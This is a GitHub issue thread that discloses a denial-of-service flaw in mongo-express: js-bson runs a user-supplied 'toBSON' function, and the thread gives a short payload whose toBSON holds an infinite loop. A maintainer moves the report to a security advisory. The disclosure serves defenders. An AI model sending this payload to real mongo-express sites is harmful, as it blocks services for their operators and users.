### ISSUE TITLE
A DoS vulnerability

### ISSUE THREAD

**Issue by xiaofen9** [mongo-express/mongo-express#547]
It is found that mongo-express allows users to pass function in its document. However, its underlying library (js-bson) will call a function named  "toBSON" from input to get customized bson data. As a result, a malicious function definition (e.g., infinite loop) can block the whole site.

https://github.com/mongodb/js-bson/blob/f4b16d91e969508c6b77b7e1f7b62bc2bc37b126/lib/parser/calculate_size.js#L29-L31

reproduce payload
```
{
        "_id": ObjectID(),
    "toBSON": function (){var i = 0; while (true) {i++}}
}
```
![image](https://user-images.githubusercontent.com/20917869/71690967-28ab6980-2d74-11ea-9520-2bbd9f8ac04c.png)

**Comment by dozoisch** [comment]
Moved to security advisory
